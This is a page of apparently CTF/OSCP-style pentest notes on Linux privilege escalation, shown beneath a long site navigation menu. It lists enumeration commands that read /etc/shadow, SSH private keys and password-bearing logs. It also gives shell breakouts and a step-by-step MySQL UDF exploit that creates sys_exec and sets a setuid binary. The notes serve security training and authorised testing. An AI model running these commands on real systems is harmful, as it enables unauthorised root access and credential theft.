CPH:SEC CTF-Notes - Hackers Resources Galore
  • ADcheatsheet
  • Project tree
  • RTFnotes
  • WindowsRedTeamCheatSheet
  • How to pass the OSCP
  • Kerberos cheatsheet
  • Privilege Escalation & Post-Exploitation
  • Awesome-Hacking-Resources
    • Contribution Guidelines
    • Awesome Hacking Tools
  • Notes VA
    • Exploitation Cheat Sheet
    • Initial Enumeration
    • Linux Privilege Escalation
    • PenetrationTestingToolsCheatSheet
    • Web Enumeration
    • Windows Privilege Escalation
    • emailgrab
    • linux_priv_esc
    • openredirect
    • 24x7x365 SUPPORT http://www.captiongenerator.com/320492/Offsec-Student-Admins
    • oscp_playlist
    • Privilege Escalation & Post-Exploitation
    • smb_enum
    • whois-file-transfer
    • Windows / Linux Local Privilege Escalation Workshop
  • OSCP-Materials
  • SCADA PLC ICS Pentest PDFs
    • PLClinks
  • Web-CTF-Cheatsheet
  • audio
    • Decode SSTV
    • Spectrogram
  • binary-exploitation
    • Binary Exploitation with Buffer Overflow
    • Exploitation
    • Binary Exploitation with Format String
    • GOT Overriding
    • Exploitation
    • Binary Exploitation with Race Conditions
    • Binary Exploitation with Time Guessing
    • Exploitation
    • Binary Exploitation with ret2plt
    • Pwntools Cheat Sheet
    • Binary Exploitation
  • blockchain
    • Blockchain Pentesting
    • Interact with Ethereum using Foundry
    • Interact with Ethereum using Python
    • smart-contract
      • Ethereum Remix Extension in VS Code
      • Solidity Assembly
      • Create a Contract for Recovery Address
      • Explicit Conversion
      • Solidity Delegatecall Attack
      • DoS with Assembly Invalid Function
      • Solidity Overflow & Underflow
      • Create a Malicious Contract
      • Create a Malicious Contract for Destructing Contract
      • Create an Attack Contract
      • Solidity Storage Values Analysis
      • Inappropriate User Authorization
      • Web3.js Cheat Sheet
  • database
    • CouchDB Pentesting
    • InfluxDB Pentesting
    • MSSQL (Microsoft SQL) Pentesting
    • MongoDB Pentesting
    • MySQL Pentesting
    • Neo4j Pentesting
    • PostgreSQL Pentesting
    • Redis Pentesting
    • SQLite Pentesting
  • dns
    • DNS (Domain Name Systems) Pentesting
    • Enumeration
    • Subdomain Takeover
  • email
    • IMAP (Internet Message Access Protocol) Pentesting
    • POP (Post Office Protocol) Pentesting
    • Exploit DNS Zone Misconfiguration & BIND Config
    • SMTP (Simple Mail Transfer Protocol) Pentesting
  • game
    • FEN Manipulation
    • Minecraft Server Pentesting
    • WebAssembly Games Hacking
  • hardware
    • Firmware Analysis
    • Gerber Viewer
    • MQTT Pentesting
    • NETGEAR Pentesting
    • SAL Logic Analysis
    • linux
      • archive
        • 7z
        • Bzip2 & Bunzip2
        • Crack Zip Password
        • Gzip & Gunzip
        • Tar
        • Zip & Unzip
      • attack
        • Warning
      • backup
        • Extract Archives
      • container
        • Basic Flow
      • management
        • Add & Delete Groups in Linux
        • Add & Delete Users in Linux
        • File Transfer in Linux
        • File & Directory Ownership in Linux
        • File & Directory Permission in Linux
        • Shell Scripting
      • post-exploitation
        • Linux Backdoors
        • Linux Pivoting
      • privilege-escalation
        • Ansible Playbook Privilege Escalation
        • Apache Conf Privilege Escalation
        • Bash eq Privilege Escalation
        • Buffer Overflow Privilege Escalation
        • Chrome Remote Debugger Pentesting
        • Exploitation
        • Command Execution
        • Extract Passwords from Firefox Profile
        • OpenSSL Privilege Escalation
        • Exploitation
        • PolKit Privilege Escalation
        • Python Eval Code Execution
        • Python Jails Escape
        • Python Privilege Escalation
        • Python Yaml Privilege Escalation
        • Remote Code Execution with YAML
        • Reverse Shell
        • Find Credentials
        • Shared Library Hijacking
        • dirty_sock (CVE-2019-7304) Version < 2.37
        • Tar Wildcard Injection PrivEsc
        • Update-Motd Privilege Escalation
        • Linux Privilege Escalation
        • Exploitation
        • doas
          • Investigation
        • sudo
          • Sudo ClamAV Privilege Escalation
          • Sudo Dstat Privilege Escalation
          • Sudo Exiftool Privilege Escalation
          • Sudo Fail2ban Privilege Escalation
          • Sudo Git Privilege Escalation
          • Sudo Java Privilege Escalation
          • Sudo OpenVPN Privilege Escalation
          • Sudo Path Traversal Privilege Escalation
          • LD_PRELOAD, LD_LIBRARY_PATH Overwriting
          • Sudo Reboot Privilege Escalation
          • Sudo Screen Privilege Escalation
          • Sudo Service Privilege Escalation
          • Sudo Shutdown, Poweroff Privilege Escalation
          • Sudo Systemctl Privilege Escalation
          • Sudo Tee Privilege Escalation
          • Sudo Umount Privilege Escalation
          • Sudo Vim Privilege Escalation
          • Sudo Wall Privilege Escalation
          • Sudo Wget Privilege Escalation
          • Sudoedit Privilege Escalation
          • Sudo Privilege Escalation
      • protocol
        • Enumeration
  • machine-learning
    • Jupyter Notebook Pentesting
    • Orange Data Mining
    • Read HDF5 (H5) File
    • Load Model from PT
    • Read QASM
    • computer-vision
      • Image Analysis for Machine Learning
      • Swapping Pixels
      • Image Recognition Bypass for Machine Learning
    • data-processing
      • Find Optimal Number of Clusters
      • Data Manipulation for Machine Learning
      • PCA (Principal Component Analysis)
    • llm
      • Automation
      • LLM Prompt Injection
    • model
      • Adversarial Attack with FGSM (Fast Gradient Signed Method)
      • ML Model Analysis
      • Model Inversion Attack
  • malware
    • Online Scanner
    • Create Macro to Code Execution
    • Static Analysis
    • Malware Analysis
    • Checking Established Network
    • Malware Dynamic Analysis with REMnux
    • Malware Static Analysis
    • NPM Supply Chain Attack
    • Example
    • Splunk Pentesting
  • memory
    • Memory Forensics
  • misc
    • Brainfuck
    • Regular Expressions (Regex/RegExp)
  • network
    • ARP (Address Resolution Protocol) Spoofing
    • Apache Hadoop Pentesting
    • Enumeration
    • FastCGI Pentesting
    • Firewall
    • Honeypots
    • Attack Flow
    • Network Traffic Analysis (NTA)
    • Networking
    • ReDoS (Regular Expression Denial of Service)
    • Rsync Pentesting
    • Tor
    • Connect with grpcui
    • attack
      • Exploitation using Metasploit
      • Anonymize Traffic with Tor
      • DoS/DDoS Attack
    • bluetooth
      • BlueBorne
    • port-forwarding
      • Port Forwarding with Chisel
      • Reverse Connection
      • Port Forwarding with SSH
      • Port Forwarding with Socat
    • protocol
      • Enumeration
      • FTP (File Transfer Protocol) Pentesting
      • Enumeration
      • Communication
      • Enumeration
      • NFS (Network File System) Pentesting
      • Enumeration
      • Enumeration
      • RTSP (Real Time Streaming Protocol) Pentesting
      • Restricted Shell (rbash, rzsh) Bypass
      • SNMP (Simple Network Management Protocol) Pentesting
      • SSH (Secure Shell) Pentesting
      • TFTP (Trivial File Transfer Protocol) Pentesting
      • Telnet Pentesting
      • Enumeration
      • VNC (Virtual Network Computing) Pentesting
      • Connect
    • tool
      • Convert PuTTY Key to OpenSSH Key
      • Tshark Cheat Sheet
      • Wireshark Cheat Sheet
    • vpn
      • Enumeration
      • OpenVPN Troubleshooting
    • wifi
      • Exploitation
      • MITM (Man in the Middle) Attack
      • WiFi Hacking
      • WiFi Password Recovery
  • penbook
    • Active Directory mapping
    • Active information gathering
    • Arp-spoofing - Sniffing traffic
    • Attacking the user
    • Automated Vulnerability Scanners
    • Bash-scripting
    • Basics
    • Basics of linux
    • Basics of windows
    • The Basics of Assembly
    • Binary exploits
    • Broken Authentication or Session Management
    • Browser vulnerabilities
    • Buffer overflow (BOF)
    • Bypass File Upload Filtering
    • Bypassing antivirus
    • physical_access_to_machine
      • rubber-ducky
    • writeups
      • NSM hack challenge
      • SANS Holiday Hack 2016 - chris
      • vulnhub
        • kioptrix 1
        • kioptrix 2 (level 1.1)
        • Quaoar - written by chris
  • printer
    • IPP (Internet Printing Protocol) Pentesting
    • Raw Printing Pentesting
  • python-pty-shells
    • LICENCE
  • reconnaissance
    • Email Analysis
  • container
    • docker
      • Docker Engine API Pentesting
      • Docker Escape
      • Docker Registry Pentesting
      • Directory Traversal & Arbitrary Command Execution (CVE-2021-41091 )
      • Docker Pentesting
    • kubernetes
      • Kubernetes Pentesting
      • MicroK8s Pentesting
  • cryptography
    • algorithm
      • AES-CBC Bit Flipping Attack
      • PadBuster
      • AES-ECB Padding Attack
      • AES (Advanced Encryption Standard)
      • Decryption
      • Online Tools
      • Base32, Base64
      • Online Tools
      • Decrypt
      • Certificates
      • DES (Data Encryption Standard)
      • Diffie-Hellman Key Exchange
      • ECC (Elliptic Curve Cryptography)
      • ECDSA in Python
      • Decrypt
      • GPG (GNU Privacy Guard)
      • HMAC
      • KDBX Files
      • Exploitation
      • MD4, MD5
      • Online Tools
      • NTLM, NTLMv2
      • Decrypt
      • PGP (Pretty Good Privacy)
      • Decrypt
      • Decrypt
      • Decrypt
      • ROT13, ROT47
      • RPNG (Pseudo Random Number Generator) Guessing
      • RSA (Rivest Shamir Adleman)
      • Sample Attacks
      • SHA1, SHA256, SHA512
  • mobile
    • android
      • Android Pentesting
      • Connect to Android Device from PC using SSH
Powered by GitBook
On this page
  • MySQL
  • Binary Exploitation
  1. Notes VA

Linux Privilege Escalation

Spawning shell/break restricted shell

python -c 'import pty; pty.spawn("/bin/sh")'

/bin/sh -i

echo os.system('/bin/bash')

(From within vi)
:!bash

Add all binary paths if PATH variable is lacking

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Set up webserver

python -m SimpleHTTPServer 8080

Basic System Information

uname -a
cat /etc/*release
cat /proc/version
cat /etc/issue

Enviromental variables

cat /etc/profile
cat/etc/bashrc
cat  $HOME/.bash_profile
cat $HOME/.bashrc
env
set

Users

Current user:
id

Other users:
who
w
last
cat /etc/passwd
cat /etc/group
cat /etc/shadow

Find files with specific group permissions:
find / -type d -group groupname -perm -g=r -print 2>/dev/null

Users with login:
grep -vE "nologin" /etc/passwd

Check user home directories:
ls -ahlR /root/
ls -ahlR /home/

User history:
cat $HOME/.bash_history
find -name ".bash_history" -exec cat {} \;

Programs running

ps -aux
ps -ef

Root programs:
ps -aux | grep root

Kernel exploits

searchsploit 
check privilege escalation script outputs

Installed software locations

/usr/local/
/usr/local/src
/usr/local/bin
/opt/
/home
/var/
/usr/src/

Debian:
dpkg -l

CentOS, OpenSuse, Fedora, RHEL:
rpm -qa

OpenBSD, FreeBSD:
pkg_info

Weak/reused/plaintext passwords

Check database config-files for webapps
Check databases
Check for weak passwords
username:username
username:username1
username:root
username:admin
username:qwerty
username:password

Search for log files containing pwd or password:
find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password'

Search configuration files containing pwd or password:
find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null

Files

Find world writable folders:
find / -perm -0002 -type d 2>/dev/null

Find writeable for current user
find / -path /proc -prune -o -writable 2>/dev/null


Find world writable files- exclude proc:
find / -path /proc -prune -o -perm -0002 -type f 2>/dev/null

Hidden or missed files in web directories:
ls -alhR /var/www/
ls -alhR /var/www/html/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/

Web logs:
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Look for Inside Service not exposed externally

cat /etc/services
netstat -anlp
netstat -ano
lsof -i TCP -n -P
lsof -i UDP -n -P

Network configuration settings

cat /etc/resolv.conf
cat /etc/networks
cat /etc/hosts

Check firewall settings:
iptables -L 
ufw status

arp -e
route
netstat -r

Suid misconfiguration

Example programs, also check for file editors/viewers:
nmap
vim
Nano
Less
More
Man 

Find suid/guid files:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

Find sticky bits - only the owner of the directory or file can delete or rename here:
find / -perm -1000 -type d 2>/dev/null

List commands current user can run sudo for
sudo -l

cat /etc/sudoers

Unmounted filesystems

Look for unmounted filesystems. If found, try to mount and enumerate
mount -l
cat /etc/vfstab
cat /etc/fstab

Cronjob

Look for anything that is owned by privileged user but writable for you

If cronjob runs scripts look for wildcard options being used and attempt command option injection with filenames https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

SSH Keys

Check all home directories
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

Bad PATH configuration

check PATH variable for a .

MySQL

If root access on MySQL then create a user defined function to escalate to root shell
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
https://www.exploit-db.com/exploits/1518/

Steps:
copy 1518.so over or lib_mysqludf_sys.so over to target
(located on kali under sqlmap directory)
/usr/share/sqlmap/udf/mysql/linux/32/lib_mysqludf_sys.so_
/usr/share/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_

mysql -u root
use mysql;
create table hack(line blob);
insert into hack values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from hack into dumpfile '/usr/lib/lib_mysqludf_sys.so';
create function sys_exec returns some integer soname'lib_mysqludf_sys.so';

Test function:
select sys_exec('id >/tmp/out; chown user:user /tmp/out');
quit
cat /tmp/out

Use function to run a setuid program:
select sys_exec('chmod + s /tmp/setuid');
/tmp/setuid

Get user hashes from MySQL

strings /var/lib/mysql/mysql/user.MYD

Debian MySQL

debian-sys-maint has access to the database and can be used to dump information from the database
Password is located in /etc/mysql/debian.cnf

Binary Exploitation

strings FILENAME

strace FILENAME

ltrace FILENAME

look for seg faults

Determine if NX is on

wmic OS Get DataExecutionPrevention_Available

coreinfo.exe | find "NX" (coreinfo.exe from Sysinternals Suite)

grep ^flags /proc/cpuinfo | head -n1 | egrep --color=auto ' (pae|nx) '

Check for ASLR

cat /proc/sys/kernel/randomize_va_space

With binary (run multiple times and see if address changes)

ldd overflow | grep libc
PreviousInitial EnumerationNextPenetrationTestingToolsCheatSheet

Last updated 2 years ago